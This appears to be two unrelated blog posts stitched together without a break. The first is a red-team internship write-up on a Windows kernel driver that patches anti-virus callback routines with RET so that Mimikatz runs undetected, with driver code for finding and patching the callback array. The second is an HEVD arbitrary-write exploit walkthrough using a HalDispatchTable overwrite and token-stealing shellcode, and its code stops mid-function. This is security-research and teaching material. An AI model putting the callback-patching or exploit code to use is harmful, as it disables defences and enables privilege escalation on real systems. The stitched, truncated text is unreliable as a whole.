
Kernel Karnage – Part 1

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi32.dll,... and all the user processes and applications. When applications or processes need more privileged access to or control over hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (on x64), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

As opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in a crash, the entire operating system goes down with it.

In 2005, with the first x64 edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Windows kernel by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately Bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.

bugcheck

3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware; there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.
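
For reference, this is roughly what the skeleton of such a software driver looks like: a minimal sketch with only a load and unload routine (illustrative only, not the driver developed during this internship).

#include <ntddk.h>

//unload routine so the driver can be stopped cleanly with "sc stop"
VOID EvilUnload(PDRIVER_OBJECT DriverObject)
{
	UNREFERENCED_PARAMETER(DriverObject);
	KdPrint(("[+] Driver unloading\n"));
}

//DriverEntry is the kernel-mode equivalent of main(); it runs when the
//service control manager loads the driver (e.g. via "sc start")
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
	UNREFERENCED_PARAMETER(RegistryPath);
	DriverObject->DriverUnload = EvilUnload;
	KdPrint(("[+] Hello from kernel land\n"));
	return STATUS_SUCCESS;
}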

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since the Windows Native API is the lowest level there), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sound familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to an EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft put an end to patching the SSDT on x64 versions of Windows (x86 remains unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback (a minimal registration sketch follows the diagram below):

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback
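
To make the mechanism more tangible, here is a minimal sketch of how a driver (an EDR/AV, or any other) would register such a routine; the routine body is purely illustrative:

//invoked by the kernel for every process creation and termination once registered
VOID CreateProcessNotify(HANDLE ParentId, HANDLE ProcessId, BOOLEAN Create)
{
	if (Create)
		KdPrint(("[+] Process %llu created (parent: %llu)\n", (ULONG64)ProcessId, (ULONG64)ParentId));
}

NTSTATUS RegisterCallback()
{
	//the kernel stores the routine's address in the callback array discussed above
	return PsSetCreateProcessNotifyRoutine(CreateProcessNotify, FALSE);
}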

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straightforward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a RET (0xC3) instruction (a minimal patching sketch follows the diagram below).
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback
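
Step 3 is where the actual tampering happens. Below is a rough sketch of how such a patch could be implemented; the 0x8 offset of the callback function pointer inside the (undocumented) callback block is an assumption based on the x64 layout, and the MDL remapping is one common way to make the read-only code page writable. This is my own illustration, not the exact code used later in this post:

//patch the first byte of a registered callback routine with RET (0xC3)
//CallbackArrayEntry is one raw 64-bit entry read from the callback array
NTSTATUS PatchCallback(ULONG64 CallbackArrayEntry)
{
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	UCHAR ret = 0xC3;

	//strip the low flag bits to recover the pointer to the callback block
	PUCHAR block = (PUCHAR)(CallbackArrayEntry & 0xFFFFFFFFFFFFFFF8);
	//assumed x64 layout: the callback function pointer sits at offset 0x8
	PVOID target = *(PVOID*)(block + 0x8);

	PMDL mdl = IoAllocateMdl(target, sizeof(ret), FALSE, FALSE, NULL);
	if (!mdl)
		return STATUS_INSUFFICIENT_RESOURCES;

	__try
	{
		MmProbeAndLockPages(mdl, KernelMode, IoModifyAccess);
		PVOID mapped = MmMapLockedPagesSpecifyCache(mdl, KernelMode, MmCached, NULL, FALSE, NormalPagePriority);
		if (mapped)
		{
			//lift the read-only protection on our private mapping and write the RET
			if (NT_SUCCESS(MmProtectMdlSystemAddress(mdl, PAGE_EXECUTE_READWRITE)))
			{
				RtlCopyMemory(mapped, &ret, sizeof(ret));
				status = STATUS_SUCCESS;
			}
			MmUnmapLockedPages(mapped, mdl);
		}
		MmUnlockPages(mdl);
	}
	__except (EXCEPTION_EXECUTE_HANDLER)
	{
		status = GetExceptionCode();
	}

	IoFreeMdl(mdl);
	return status;
}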

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg:

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

;
; evil.inf
;

[Version]
Signature="$WINDOWS NT$"
Class=System
ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
Provider=%ManufacturerName%
DriverVer=
CatalogFile=evil.cat
PnpLockDown=1

[DestinationDirs]
DefaultDestDir = 12


[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]


[DefaultInstall.ntamd64]

[Standard.NT$ARCH$]


[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
ClassName=""
DiskName="evil Source Disk"

Once the driver was compiled and signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.

bsod

Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.

PsSetCreateProcessNotifyRoutine

Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.

PspSetCreateProcessNotifyRoutine

Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and
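
In driver code the same operation is a simple mask over each array entry; a minimal sketch (assuming the 64-slot process-creation callback array of recent Windows 10 builds):

//walk the callback array and print each registered callback block
VOID DumpCallbackArray(PULONG64 CallbackArray)
{
	for (ULONG i = 0; i < 64; i++)
	{
		ULONG64 entry = CallbackArray[i];
		if (!entry)
			continue;

		//same operation as in WinDbg: mask off the low flag bits
		//to recover the pointer to the registered callback block
		KdPrint(("[%02lu] callback block at %llx\n", i, entry & 0xFFFFFFFFFFFFFFF8));
	}
}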

The driver roughly follows the same method to locate the callback array in memory: it calculates offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function’s base address, which it obtains using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop through the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for the 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;

			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
	
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

            //copy 4 bytes after LEA, r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //resolve the absolute address of the callback array: LEA address + instruction length (7) + relative offset
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where the OPCODE_* arrays are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumber).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array
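
As a reference for the second part of that fix, here is a hedged sketch of what an index function based on the build number could look like; the build-to-index mapping below is illustrative, not the project's actual table:

//map the running build number to an index into the OPCODE_* arrays
ULONG GetWindowsIndex()
{
	RTL_OSVERSIONINFOW osVersionInfo = { 0 };
	osVersionInfo.dwOSVersionInfoSize = sizeof(osVersionInfo);

	if (!NT_SUCCESS(RtlGetVersion(&osVersionInfo)))
		return 0;

	switch (osVersionInfo.dwBuildNumber)
	{
	case 19041:		//Windows 10 20H1
	case 19042:		//Windows 10 20H2
		return 14;	//illustrative value
	case 21996:		//early Windows 11 build
		return 15;	//illustrative value
	default:
		return 0;	//unsupported build, caller should bail out
	}
}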

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Improving the write-what-where HEVD PoC (x86, Win7)

Introduction

This one is about another HEVD exercise (see my previous HEVD post here): the arbitrary write (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/ArbitraryWrite.c). The main reason I decided to write up my experience with it is that it instantly occurred to me that the official exploitation process, used both in the original PoC and described here, leaves the kernel in an unstable state with a high probability of a crash at any time after the exploit is run. So, this post is more about the exploitation technique, the problem it creates and the solution it calls for, rather than the vulnerability itself. It also occurred to me that doing HEVD exercises thoroughly (understanding exactly what happens and how) is quite helpful in improving one's general understanding of how the operating system works.

When it comes to stuff like setting up the environment, please refer to my earlier HEVD post. Now let's get started.

The vulnerability

This one is a vanilla write-what-where case: code running in kernel mode performs a write operation of an arbitrary (user-controlled) value into an arbitrary (user-controlled) address. In the case of an x86 system (we keep using these for such basic exercises, as they are easier to work with and debugger output with 32-bit addresses is more readable), it usually boils down to being able to write an arbitrary 32-bit value into an arbitrary 32-bit address. However, it is also usually possible to trigger the vulnerability more than once (which we will do in this case, by the way, just to fix the state of the kernel after privilege escalation), so effectively we control data blocks of any size, not just four bytes.

First of all, we have the input structure definition at https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/ArbitraryOverwrite.h - it's as simple as it could be, just two pointers:
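
Paraphrased from the linked header, the structure looks like this:

typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;     // pointer to the value to be written (user controlled)
    PULONG_PTR Where;    // pointer to the destination address (user controlled)
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;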

Then, we have the TriggerArbitraryWrite function in https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/ArbitraryWrite.c (screenshot below). First, we have a call to ProbeForRead on the input pointer, to make sure that the structure itself is located in user space (both ProbeForRead and ProbeForWrite methods throw an access violation exception if the address provided turns out to belong to the kernel space address range). Then, What and Where values held by the structure (note that these are both pointers and there are no additional checks here whether the addresses those pointers contain belong to kernel or  user space!) are copied into the local kernel mode function variables:

Then, we have the vulnerable write-what-where:

Now, let's see what this C code actually looks like after it's compiled (disassembly view in windbg):

Exploitation

So, as always, we just want to run our shellcode in kernel mode, whereas the only thing our shellcode does is overwrite the security token of our exploit process with that of the SYSTEM process (token-stealing shellcode). Again, refer to the previous blog post https://hackingiscool.pl/hevd-stackgs-x86-win7/ to get more details on the shellcode used.

To exploit the arbitrary write-what-where to get our shellcode executed by the kernel, we want to overwrite some pointer, some address residing in the kernel space, that either gets called frequently by other processes (and this is what causes trouble post exploitation if we don't fix it!) or is called by a kernel-mode function that we can call from our exploit process (this is what we will do to get our shellcode executed). In this case we will stick to the HalDispatchTable method - or to be more precise, HalDispatchTable+0x4. The method is already described here https://poppopret.blogspot.com/2011/07/windows-kernel-exploitation-basics-part.html (again, I recommend this read), but let's paraphrase it.

First, we use our write-what-where driver vulnerability to overwrite 4 bytes of the nt!HalDispatchTable structure (nt!HalDispatchTable at offset 0x4, to be exact). This is because the NtQueryIntervalProfile function - a function that we can call from user mode - results in calling nt!KeQueryIntervalProfile (which already happens after switching into kernel mode), and that function calls whatever is stored at nt!HalDispatchTable+0x4:

So, the idea is to first exploit the arbitrary write to overwrite whatever is stored at nt!HalDispatchTable+0x4 with the user-mode address of our shellcode, then call NtQueryIntervalProfile only to trick the kernel into executing it via calling HalDispatchTable+0x4 - and it works like a charm on Windows 7 (kernel-mode execution of code located in a user-mode buffer, as there is no SMEP in place).
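
A minimal sketch of the user-mode trigger, assuming the write-what-where has already placed the shellcode address at nt!HalDispatchTable+0x4; NtQueryIntervalProfile is undocumented, so it is resolved from ntdll.dll at runtime:

#include <windows.h>

typedef LONG (WINAPI *NtQueryIntervalProfile_t)(ULONG ProfileSource, PULONG Interval);

// Force the kernel down the nt!KeQueryIntervalProfile path, which ends up
// calling whatever is stored at nt!HalDispatchTable+0x4 - i.e. our shellcode.
void TriggerShellcode(void)
{
    NtQueryIntervalProfile_t pNtQueryIntervalProfile =
        (NtQueryIntervalProfile_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");
    ULONG interval = 0;
    if (pNtQueryIntervalProfile)
        pNtQueryIntervalProfile(2, &interval); // the profile source value itself is not important here
}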

The problem

The problem is that nt!HalDispatchTable is a global kernel structure, which means that once we tamper with it, the modification will still be there whenever any other program refers to it (e.g. calls NtQueryIntervalProfile). And it WILL affect whatever we do while enjoying our SYSTEM privileges, because it WILL crash the entire system.

Let's say that the buffer holding our shellcode in our user mode exploit is at 00403040. If we overwrite the original value of nt!HalDispatchTable+0x4 with it, that shellcode will only be reachable and thus callable if the current process being executed is our exploit. Once the scheduler interrupt switches the current CPU core to another process, in the context of that process the user mode virtual address of 00403040 will either be invalid (won't even fall into any committed/reserved virtual address range within the virtual address space used by that process) or it will be valid as an address, but in reality it will be mapped to a different physical address, which means it will hold something completely different than our shellcode. Remember, each process has its own address space, separate from all other processes, whereas the address space of the kernel is global for the entire system. Therefore every kernel space address makes sense to the entire system (kernel and all processes), whereas our shellcode at 00403040 is only accessible to our exploit process AND the kernel - but only when the process currently being executed is our exploit. The same address referred to from a different process context will be invalid/point at something completely different.

So, after we tamper with HalDispatchTable+0x4 by overwriting it with the address of the shellcode residing in the memory of the current process (our exploit) and call NtQueryIntervalProfile to get the shellcode executed, our process should now have SYSTEM privileges (and so will any child processes it spawns, e.g. a cmd.exe shell).

Therefore, if any other process in the system, after we are done with privilege escalation, calls NtQueryIntervalProfile, it too will trick the kernel into trying to execute whatever is located at the 00403040 address. But since the calling process won't have this address in its working set, or will have something completely different mapped under it, this will lead to a system crash. Of course this could be tolerated if we performed some sort of persistence immediately upon the elevation of privileges, but either way as attackers we don't want disruptions that would hurt our customer or potentially tip the defenders off. We don't want system crashes.

This is not an imaginary problem. Right after running the initial version of the PoC (which I put together based on the official HEVD PoC), all of a sudden I saw this in windbg:

Obviously, whatever was located at 0040305b at the time (000a - add byte ptr [edx],cl) was not part of my shellcode. So I did a quick check to see which process was causing this, by issuing the !vad command to display the current process VADs (Virtual Address Descriptors) - basically the memory map of the current process, including the names of the files mapped into the address space as mapped sections, which includes the path to the original EXE file:

One of svchost.exe processes causing the crash by calling HalDispatchTable+0x4

One more interesting thing is that - if we look at the stack trace (two screenshots above) - the call of HalDispatchTable+0x4 did not originate from the KeQueryIntervalProfile function, but from nt!EtwAddLogHeader+0x4b, which suggests that HalDispatchTable+0x4 is called from more places than just NtQueryIntervalProfile, making the probability of such a post-exploitation crash very real.

The solution

So, the obvious solution that comes to mind is restoring the original HalDispatchTable+0x4 value after exploitation. The easiest approach is to simply trigger the vulnerability again, with the same "where" argument ( HalDispatchTable+0x4) and a different "what" argument (the original value as opposed to the address of our user mode shellcode).

Now, to be able to do this, first we have to know what that original value of nt!HalDispatchTable+0x4 is. We can't read it in kernel mode from our shellcode, since we need to overwrite it first in order to get the shellcode executed in the first place. Luckily, I figured out it can be calculated based on information obtainable from regular user-mode execution (again, keep in mind this is only directly relevant to the old Windows 7 x86 I keep practicing on; I haven't tried this on modern Windows yet, and I know that SMEP and probably CFG would be our main challenges there).

First of all, let's see what that original value is before we attempt any overwrite. So, let's view nt!HalDispatchTable:

The second DWORD in the memory block under nt!HalDispatchTable contains 82837940. Which definitely looks like an address in kernel mode. It has to be - after all, it is routinely called from other kernel-mode functions, as code, so it must point at kernel-mode code. Once I looked it up with the dt command, windbg resolved it to HaliQuerySystemInformation. Running the disassembly view command uu on it revealed the full symbol name (hal!HaliQuerySystemInformation) and showed that in fact there is a function there (just based on the first few assembly lines we can see it is a normal function prologue).

OK, great, so we know that nt!HalDispatchTable+0x4, the pointer we abuse to turn arbitrary write into a privilege escalation, originally points to a kernel-mode function named hal!HaliQuerySystemInformation (which means the function is a part of the hal module).

Let's see more about it:

Oh, so the module name behind this is halacpi.dll. Now we both have the function name and the module name. Based solely on this information, we can attempt to calculate the current address of hal!HaliQuerySystemInformation dynamically. To do this, we will require the following two values:

  1. The current base address at which the halacpi.dll module has been loaded (we will get it dynamically by calling NtQuerySystemInformation from our exploit).
  2. The offset of the HaliQuerySystemInformation function within the halacpi.dll module itself (we will pre-calculate the offset value and hardcode it into the exploit code - so it will be version-specific). We can calculate this offset in windbg by subtracting the current base address of the halacpi.dll kernel-mode module (e.g. taken from the lmDvmhal command output) from the absolute address of the hal!HaliQuerySystemInformation function as resolved by windbg. We can also calculate (confirm) the same offset with static analysis: load that version of halacpi.dll into Ghidra, download and load the symbols file, find the function's static address within the binary, and subtract the preferred module base address from it.

The screenshot below shows the calculation done in windbg:

Calculating the offset in windbg

The screenshots below show the same process with Ghidra:

Preferred image base - 00010000
Finding the function (symbols must be loaded)
HaliQuerySystemInformation static address in the binary (assembly view)

Offset calculation based on information from Ghidra: 0x2b940 - 0x10000 = 0x1b940.

So, during runtime, we need to add 0x1b940 (for this particular version of halacpi.dll - remember, other versions will most likely have different offsets) to the dynamically retrieved load base address of halacpi.dll, which we retrieve by calling NtQuerySystemInformation and iterating over the buffer it returns (see the PoC code for details). The same function, NtQuerySystemInformation, is used to calculate the runtime address of the HalDispatchTable - the "where" in our exploit (as in the original HEVD PoC code and many other exploits of this sort). In all cases NtQuerySystemInformation is called to get the current base address of the ntoskrnl.exe module (the Windows kernel). Then, instead of using a hardcoded (fixed) offset to get HalDispatchTable, a neat trick with LoadLibraryA and GetProcAddress is used to calculate it dynamically during runtime (see the full code for details).
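
For reference, a condensed sketch of both lookups (error handling trimmed); SystemModuleInformation (class 11) and the module list layout below are the usual undocumented definitions relied upon by exploits of this kind:

#include <windows.h>
#include <stdlib.h>

#define SystemModuleInformation 11

typedef struct _RTL_PROCESS_MODULE_INFORMATION {
    HANDLE Section;
    PVOID  MappedBase;
    PVOID  ImageBase;
    ULONG  ImageSize;
    ULONG  Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR  FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES;

typedef LONG (WINAPI *NtQuerySystemInformation_t)(ULONG, PVOID, ULONG, PULONG);

// Returns the kernel-mode address of nt!HalDispatchTable on the running system.
PVOID FindHalDispatchTable(void)
{
    NtQuerySystemInformation_t pNtQuerySystemInformation =
        (NtQuerySystemInformation_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
    ULONG len = 0;
    pNtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
    RTL_PROCESS_MODULES *mods = (RTL_PROCESS_MODULES *)malloc(len);
    pNtQuerySystemInformation(SystemModuleInformation, mods, len, &len);

    // Module 0 is the kernel image (ntoskrnl.exe, or ntkrnlpa.exe on Win7 x86 with PAE).
    PVOID kernelBase = mods->Modules[0].ImageBase;
    CHAR *kernelName = (CHAR *)mods->Modules[0].FullPathName + mods->Modules[0].OffsetToFileName;

    // Map the same image into our process and let GetProcAddress do the math:
    // kernel_va = kernel_base + (user_va - user_base).
    HMODULE user = LoadLibraryA(kernelName);
    PVOID userHal = (PVOID)GetProcAddress(user, "HalDispatchTable");
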